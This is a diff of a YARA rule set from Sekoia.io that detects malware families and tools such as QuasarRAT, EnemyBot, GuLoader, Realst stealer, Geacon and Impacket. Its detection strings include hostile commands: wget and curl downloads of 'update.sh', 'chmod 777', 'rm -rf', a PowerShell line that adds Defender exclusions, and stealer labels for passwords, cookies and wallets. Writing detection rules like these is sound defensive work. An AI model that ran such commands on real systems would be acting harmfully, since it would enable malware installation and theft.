-		description = "Detects some kind of HTMLSmuggling used by APT28"
+		description = "APT29 implants from October 2022"
 		author = "Sekoia.io"
-		id = "2e20c992-d971-4c0f-99b3-a7d528c7055a"
-		date = "2023-09-11"
+		id = "0f270e75-f687-4fdc-a980-fde81107a4d6"
+		date = "2023-02-15"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_htmlsmuggling.yar#L1-L17"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_apt29_2022_10.yar#L4-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "47cca1d0a0843c8df43661ee8188dae86cce06e1f3982973871863728d328e89"
+		logic_hash = "b9300c2f06b54b16e1cab579d686d986caacf3b6eccec3a4e62d58e94b50bfb4"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "click();" ascii
-		$s2 = "window.location.replace("
+		hash1 = "1cffaf3be725d1514c87c328ca578d5df1a86ea3b488e9586f9db89d992da5c4"
+		hash2 = "381a3c6c7e119f58dfde6f03a9890353a20badfa1bfa7c38ede62c6b0692103c"
 
 	condition:
-		$s1 in ( @s2 .. @s2-100 )
+		pe.imphash( ) == "39b818e7bac0a276f509f8c47e467666" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6621113d9f212c71b8dd3ce85c62b251" )
 }
-rule SEKOIA_Infostealer_Win_Meduzastealer : FILE
+rule SEKOIA_Implant_Win_Quasarrat
 {
 	meta:
-		description = "Finds MeduzaStealer samples based on specific strings"
+		description = "Detect QuasarRAT (reted from samples 2023-03)"
 		author = "Sekoia.io"
-		id = "1276f485-aa5d-491b-89d8-77f98dc496e1"
-		date = "2023-06-20"
+		id = "492fdffc-8e5f-4225-a2eb-cd6d80e6bcb8"
+		date = "2023-03-17"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_meduzastealer.yar#L1-L26"
+		reference = "https://blog.alyac.co.kr/5103"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_quasarrat.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e81a5a9611662422eb7a87c0c1a370cee6f138fd6169225d969b669337d91a06"
+		logic_hash = "d3c1d65a23aaea5423025cb2f755d0f2298cbf02b2a4e34430eae8c3e1263185"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "emoji" ascii
-		$str02 = "%d-%m-%Y, %H:%M:%S" ascii
-		$str03 = "[UTC" ascii
-		$str04 = "user_name" ascii
-		$str05 = "computer_name" ascii
-		$str06 = "timezone" ascii
-		$str07 = "current_path()" ascii
-		$str08 = "[json.exception." ascii
-		$str09 = "GDI32.dll" ascii
-		$str10 = "GdipGetImageEncoders" ascii
-		$str11 = "GetGeoInfoA" ascii
+		$ = {63 00 68 00 63 00 70 00 20 00 36 00 35 00 30 00 30 00 31 00}
+		$ = {65 00 63 00 68 00 6f 00 20 00 44 00 4f 00 4e 00 54 00 20 00 43 00 4c 00 4f 00 53 00 45 00 20 00 54 00 48 00 49 00 53 00 20 00 57 00 49 00 4e 00 44 00 4f 00 57 00 21 00}
+		$ = {70 00 69 00 6e 00 67 00 20 00 2d 00 6e 00 20 00 31 00 30 00 20 00 6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 20 00 3e 00 20 00 6e 00 75 00 6c 00}
+		$ = {64 00 65 00 6c 00 20 00 2f 00 61 00 20 00 2f 00 71 00 20 00 2f 00 66 00 20 00 22 00}
+		$ = "DoShellExecute"
+		$ = "DoDownloadFile"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them and filesize > 500KB
+		all of them
 }
-rule SEKOIA_Malware_Httpshell_Strings : FILE
+rule SEKOIA_Bot_Lin_Enemybot_April22 : FILE
 {
 	meta:
-		description = "Detects HTTPShell based on URL patterns"
+		description = "Detect enemybot based on command line observed in strings"
 		author = "Sekoia.io"
-		id = "58f25666-5dc2-4f4f-9fac-fc05d1e66945"
-		date = "2024-01-08"
+		id = "5778c653-39ce-4f5d-b10b-1503b74e5041"
+		date = "2022-04-14"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_httpshell_strings.yar#L1-L20"
+		reference = "https://twitter.com/3xp0rtblog/status/137520616938452173://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_enemybot_april22.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8f6f6ad459cc6edd80432528a507ca2cb84e6859be94f2e1caaea801bf809375"
+		logic_hash = "18ea06e60259f8d7d639b0e4659f0f5e166e9589d617f5766c06968af5e56aa6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256532,28 +256648,31 @@ rule SEKOIA_Malware_Httpshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/api/v1/Client/Info" wide ascii
-		$ = "/api/v1/Client/Download" wide ascii
-		$ = "/api/v1/Client/Upload" wide ascii
-		$ = "/api/v1/Client/Info" base64 base64wide
-		$ = "/api/v1/Client/Download" base64 base64wide
-		$ = "/api/v1/Client/Upload" base64 base64wide
+		$cmd0 = "wget http://%s/update.sh" ascii
+		$cmd1 = "busybox wget http://%s/update.sh" ascii
+		$cmd2 = "curl http://%s/update.sh" ascii
+		$cmd3 = "chmod 777 update.sh" ascii
+		$cmd4 = "rm -rf update.sh" ascii
+		$str0 = "ENEMEYBOT" ascii xor
+		$str1 = "KEKSEC" ascii xor
+		$str2 = "/tmp/.pwned" ascii xor
+		$str3 = "echo -e \"\x65\x6e\x65\x6d\x79"
 
 	condition:
-		3 of them and filesize < 5MB
+		( uint32( 0 ) == 0x464c457f or uint32( 0 ) == 0xfeedfacf ) and ( 4 of ( $cmd* ) or 2 of ( $str* ) )
 }
-rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
+rule SEKOIA_Guloader_Unpacker_Decoded : FILE
 {
 	meta:
-		description = "Detects Lazarus DangerousPassword LNKs"
+		description = "GuLoader Unpacker b64 decoded"
 		author = "Sekoia.io"
-		id = "32533880-7f75-4682-a7ae-9868d0b5174b"
-		date = "2022-07-26"
+		id = "ca3f4fce-b3a1-4672-a2ca-29ea347eb23d"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_dangerouspassword_lnk.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_unpacker_decoded.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "79731450c4623f614c55d8c08d879579e21fd38c85d2a288724b6e9470de6e29"
+		logic_hash = "5de4a147b2dea8a144905b7f1786199bfeef3006ac58179409cfd3dcaa116725"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256561,140 +256680,176 @@ rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {6D 00 73 00 68 00 2A}
-		$s2 = {25 00 70 00 75 00 62 00 6C 00 69 00 63 00 25}
-		$s3 = {44 00 4F 00 20 00 73 00 74 00 61 00 72 00 74}
-		$b1 = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 2F 00 62 00 20 00 6D 00 73 00 68 00 74 00 61}
-		$c1 = {68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 62 00 69 00 74 00 2E 00 6C 00 79 00 2F}
+		$jumps = {71 01 9b 71 01 9b}
+		$s1 = "([String]$"
+		$s2 = "For($"
+		$s3 = ",[Parameter(Position = 1)] [Type] $"
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and filesize > 1KB and filesize < 40MB and ( all of ( $s* ) or $b1 or ( $s1 and $c1 ) )
+		filesize < 500KB and @jumps < 1000 and 2 of ( $s* )
 }
-rule SEKOIA_Apt_Spikedwine_Malicious_Hta
+rule SEKOIA_Infostealer_Mac_Realst : FILE
 {
 	meta:
-		description = "Detects malicious HTA used by SPIKEDWINE"
+		description = "Finds Realst Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "e4526142-d98a-bf35-9d2c-ca2e83638c4b"
-		date = "2024-02-29"
+		id = "16a89317-c92d-4e13-94d3-a85a915f52e5"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_spikedwine_malicious_hta.yar#L1-L17"
+		reference = "https://iamdeadlyz.gitbook.io/malware-research/july-2023/fake-blockchain-games-deliver-redline-stealer-and-realst-stealer-a-new-macos-infostealer-malware#realst-stealer-macos"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_mac_realst.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "305896cde5d95c29de511541a961063730709d40d67a8788f084c17f181e3baf"
+		logic_hash = "72e694e5c32cbaeb7dff7913fde671619e2c8d892e552546dd1682e38f6804c5"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 30
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HTA:APPLICATION ID=" nocase
-		$ = "return _0x"
-		$ = "font-size: 18px;"
+		$str00 = "realst@" ascii
+		$str01 = "IP:" ascii
+		$str02 = "OS:" ascii
+		$str03 = "PC PASSWORD:" ascii
+		$str04 = "Cookies:" ascii
+		$str05 = "Wallets:" ascii
+		$str06 = "Apps:" ascii
+		$str07 = "USERNAME: ]" ascii
+		$str08 = "FILENAME:" ascii
+		$str09 = "multipart/form-data; boundary=" ascii
+		$str10 = "src/browsers/firefox/modules/decryptors.rs" ascii
+		$str11 = "{\"event_id\":\"" ascii
+		$str12 = "..browsers..firefox..modules..data_stealers.." ascii
+		$str13 = "..browsers..chromium..modules..key_stealers.." ascii
+		$str14 = "..browsers..firefox..modules..decryptors.." ascii
+		$str15 = "url: , login: , password:" ascii
 
 	condition:
-		all of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and 13 of ( $str* )
 }
-rule SEKOIA_Implant_Win_Quasarrat
+rule SEKOIA_Apt_Kimsuky_Sharpext_Jsexfil_Strings : FILE
 {
 	meta:
-		description = "Detect QuasarRAT (reted from samples 2023-03)"
+		description = "Detects the exfiltration JS code of SharpExt"
 		author = "Sekoia.io"
-		id = "492fdffc-8e5f-4225-a2eb-cd6d80e6bcb8"
-		date = "2023-03-17"
+		id = "c9ebd123-6450-4424-93d1-60322bd97bf6"
+		date = "2022-07-29"
 		modified = "2024-12-19"
-		reference = "https://blog.alyac.co.kr/5103"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_quasarrat.yar#L1-L25"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_jsexfil_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d3c1d65a23aaea5423025cb2f755d0f2298cbf02b2a4e34430eae8c3e1263185"
+		logic_hash = "37ea72b369baaced89f30f655901cc4a9d6a70d00cfca3b92a1015aca64d4e2c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {63 00 68 00 63 00 70 00 20 00 36 00 35 00 30 00 30 00 31 00}
-		$ = {65 00 63 00 68 00 6f 00 20 00 44 00 4f 00 4e 00 54 00 20 00 43 00 4c 00 4f 00 53 00 45 00 20 00 54 00 48 00 49 00 53 00 20 00 57 00 49 00 4e 00 44 00 4f 00 57 00 21 00}
-		$ = {70 00 69 00 6e 00 67 00 20 00 2d 00 6e 00 20 00 31 00 30 00 20 00 6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 20 00 3e 00 20 00 6e 00 75 00 6c 00}
-		$ = {64 00 65 00 6c 00 20 00 2f 00 61 00 20 00 2f 00 71 00 20 00 2f 00 66 00 20 00 22 00}
-		$ = "DoShellExecute"
-		$ = "DoDownloadFile"
+		$ = "var req_url" ascii fullword
+		$ = "var newReqId" ascii fullword
+		$ = "chrome.tabs.query" ascii fullword
+		$ = "payload.message.flags = new Object();" ascii fullword
 
 	condition:
-		all of them
+		all of them and filesize < 50KB
 }
-rule SEKOIA_Infostealer_Win_Lumma_Strings_Sept23 : FILE
+rule SEKOIA_Implant_Lin_Geacon : FILE
 {
 	meta:
-		description = "Finds Lumma samples based on the specific strings"
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "45900760-c10d-40c0-a49a-c66358a8a66a"
-		date = "2023-09-14"
+		id = "ad71522e-270b-47d0-9c01-081f05a2b72a"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lumma_strings_sept23.yar#L1-L23"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_lin_geacon.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "099dd81a72f8c9dac38fd0f9ab4e99b60f0e7742d6a64313e2989aa8955c01ec"
+		logic_hash = "c6fa5815bf618eb588d511f18231042944dee20c1b13096c44910d43ca552bfa"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2023-10-31"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str10 = "CryptStringToBinaryA" ascii
-		$str11 = "WinHttpQueryDataAvailable" ascii
-		$str12 = "GetComputerNameExA" ascii
-		$str13 = "GetCurrentHwProfileW" ascii
-		$str14 = "ntdll.dll" wide
-		$str16 = "minkernel\\crts\\ucrt\\inc\\corecrt_internal_strtox.h" wide
-		$str17 = "xxxxxxxxxxx" ascii
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-
-rule SEKOIA_Reverseshell_Win_1St_Troy : FILE
+rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
 {
 	meta:
-		description = "Detect the 1st Troy Reverse Shell agent used by Andariel"
+		description = "Detects generic PE embbeding impacket"
 		author = "Sekoia.io"
-		id = "b40b742d-8b1e-4d99-8df5-6cb8c9a7d8bd"
-		date = "2023-09-04"
+		id = "43936dcc-0d74-43dd-996a-c27a28cef283"
+		date = "2022-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/reverseshell_win_1st_troy.yar#L4-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_impacket_compiled_binary.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a85a6ef0fe3b3fde3cb833579f4fd69cd159737888ae41e69e40a6bdc1172d1f"
+		logic_hash = "133f9d0103774701894ea884bc2c52840b405fa21acb9ebab615816ec411b0bf"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "186a6663eb91999b3e2637898ab40034f5fcd451150c9199d9b49328e64f90b5"
-		hash2 = "5b015e69629de37507e96ce258c27479d157714121d7c622698c6d1d6b547425"
 
 	strings:
-		$s1 = "1th Troy/02___Go/Reverse_Base64_Pipe"
+		$i1 = "impacket.crypto" fullword
+		$i2 = "impacket.dcerpc" fullword
+		$i3 = "impacket.ese" fullword
+		$i4 = "impacket.hresult_errors" fullword
+		$i5 = "impacket.krb5" fullword
+		$i6 = "impacket.nmb" fullword
+		$i7 = "impacket.nt_errors" fullword
+		$i8 = "impacket.ntlm" fullword
+		$i9 = "impacket.smb" fullword
+		$i10 = "impacket.smb3" fullword
+		$i11 = "impacket.smb3structs" fullword
+		$i12 = "impacket.smbconnection" fullword
+		$i13 = "impacket.spnego" fullword
+		$i14 = "impacket.structure" fullword
+		$i15 = "impacket.system_errors" fullword
+		$i16 = "impacket.tds" fullword
+		$i17 = "impacket.uuid" fullword
+		$i18 = "impacket.version" fullword
+		$i19 = "impacket.winregistry" fullword
+		$py = "PYZ-00.pyz"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "657d7495796c36297ec1c13aaedf1dd3" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "debd992f27402355766cf3b5b47abe94" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "687d2535086bd055af5716760a2d87ce" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "78389349844e8d2d719603fc389779bf" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "44563b597e806af8a9ebe026c9ea6a53" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5db8685a067d106fe66292b828a2161c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1268012f292e60785825726967a4e63e" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c7b760c8b603f39a5ff9867accbad427" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d28526f9543ecf429de4a863b8901575" )
+		uint16be( 0 ) == 0x4d5a and filesize > 1MB and 3 of ( $i* ) and $py
 }
-rule SEKOIA_Rat_Win_Arrow_Str : FILE
+rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
 {
 	meta:
-		description = "Finds Arrow RAT samples based on the specific malware strings"
+		description = "Detects Saitama backdoor variants"
 		author = "Sekoia.io"
-		id = "69f6572c-91ed-4fb6-b886-5ad2dabef3d3"
-		date = "2022-08-19"
+		id = "f885551a-d0f0-431d-aa4f-7caa93b1db6a"
+		date = "2022-05-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_arrow_str.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_saitama_backdoor_may2022_2.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "faf66a14e563066bb86ceadc787c092a5a13a43f936f0d9d19fbe7d4352ea5d8"
+		logic_hash = "622c386d4b10b81a5c84f9c093d91add04497a707ba88e8395fda8587b5c3791"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256702,88 +256857,95 @@ rule SEKOIA_Rat_Win_Arrow_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$hvnc01 = "DESKTOP_JOURNALRECORD" ascii
-		$hvnc02 = "DESKTOP_ENUMERATE" ascii
-		$hvnc03 = "DESKTOP_SWITCHDESKTOP" ascii
-		$hvnc04 = "DESKTOP_CREATEWINDOW" ascii
-		$hvnc05 = "StartHVNC" ascii
-		$str01 = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c" wide
-		$str02 = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath" wide
-		$str03 = "cvtres.exe" wide
-		$str04 = "qbkTHriRRbQjaArtJfF" wide
-		$str05 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=" wide
-		$str06 = "Stub.exe" ascii wide
-		$str07 = "DePikoloData" ascii
+		$ = "_CorExeMain"
+		$ = "GetAgentID"
+		$ = "ComputeStringHash"
+		$ = ".Agent.pdb"
+		$ = "TaskExecTimeout"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of ( $hvnc* ) and 5 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Pdf : FILE
+rule SEKOIA_Exploit_Linux_Eop_Cve202121974_Exploit_Strings : CVE_2021_21974 FILE
 {
 	meta:
-		description = "Detects malicious PDF used by APT29 to drop Wineloader"
+		description = "Detects CVE-2021-21974 Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "b1db731e-471e-493a-b76c-38d2808ccac9"
-		date = "2024-03-25"
+		id = "8e1fbbe5-7d51-48b4-80d5-90abff8cab9e"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_wineloader_malicious_pdf.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_cve202121974_exploit_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "9712217ff3597468b48cdf45da588005de3a725ba554789bb7e5ae1b0f7c02a7"
-		hash = "3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9"
-		logic_hash = "784f5ab2602e2185e8253b5b8d9a084ede0604457b0a0674fceffbcb226e3ba1"
+		logic_hash = "a2e6e2660fcbf6ffa80809c02ca78fae85d27f6cd8d2c83bb2645a86124ca7f2"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "CVE-2021-21974, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<</Type/Annot/Subtype/Link/Border[0 0 0]/Rect["
-		$s2 = "/A<</Type/Action/S/URI/URI("
-		$s3 = { 2f [2-10] 2e 70 68 70 29 3e 3e }
-		$s4 = "JamrulNormal"
+		$ = ".name.replace('Thread','SLP Client'"
+		$ = "print('[' + name + '] recv: ', d)"
+		$ = "requests[28].put(connect())"
+		$ = "[+] stack enviorn address:"
 
 	condition:
-		uint32be( 0 ) == 0x25504446 and $s2 in ( @s1 .. @s3 ) and $s4
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Backdoor_Oyster
+rule SEKOIA_Malware_Venom_Agent_Strings : FILE
 {
 	meta:
-		description = "Detects files related to the Oyster backdoor."
+		description = "Detects Venom agent strings"
 		author = "Sekoia.io"
-		id = "f95f98ea-1e52-45ae-8abf-a986f95d4ab2"
-		date = "2024-08-29"
+		id = "87633510-8b39-4eb1-b95b-4ebff21f3bba"
+		date = "2022-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_oyster.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_venom_agent_strings.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ffd84d0c7064bcd69121aa606bc642ff2b5c9927ba622260a02a9689c7ab8878"
+		logic_hash = "66dd1cb7bd66fcf78c8eaad8aaab7cfd624b898b7b479e571bacf5c4e48edac9"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "CleanUp30.dll" ascii fullword
-		$s2 = "MSTeamsSetup_c_l_.exe" ascii fullword
+		$ = "dispather.handleDownloadCmd"
+		$ = "dispather.handleUploadCmd"
+		$ = "dispather.handleShellCmd"
+		$ = "dispather.handleSocks5Cmd"
+		$ = "dispather.handleLForwardCmd"
+		$ = "dispather.localLForwardServer"
+		$ = "dispather.handleRForwardCmd"
+		$ = "dispather.AgentHandShake"
+		$ = "dispather.AgentParseTarget"
+		$ = "dispather.PipeWhenClose"
+		$ = "dispather.handleSshConnectCmd"
+		$ = "node.(*NetworkTopology).InitNetworkMap"
+		$ = "node.CopyNet2Node"
+		$ = "node.(*Node).CommandHandler.func1"
+		$ = "node.(*Buffer).WriteLowLevelPacket"
+		$ = "protocol.(*Packet).ResolveDat"
+		$ = "netio.InitTCP.func2"
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and 6 of them
 }
-rule SEKOIA_Hacktool_Rubeus_Strings : FILE
+
+rule SEKOIA_Launcher_Win_Bluehaze : FILE
 {
 	meta:
-		description = "Detects Rubeus based on strings"
+		description = "Detect the BLUEHAZE malware"
 		author = "Sekoia.io"
-		id = "048cab99-c288-44c2-9dc6-74eed02ef8f5"
-		date = "2022-02-15"
+		id = "ccfe0593-0a9f-4369-952e-5cef2f459bb3"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_rubeus_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_bluehaze.yar#L4-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "606c1b3c29dd4b609eba64bc5d02a81859bb574ee10bce8b0f355ac01d99689f"
+		logic_hash = "56a9d6d713a5744e77c8d34ad28983bb3b2aded1abff47dbf2d887724bd3ed4e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256791,88 +256953,74 @@ rule SEKOIA_Hacktool_Rubeus_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "includeComputerAccounts" ascii
-		$ = "passwordsOutfile" ascii
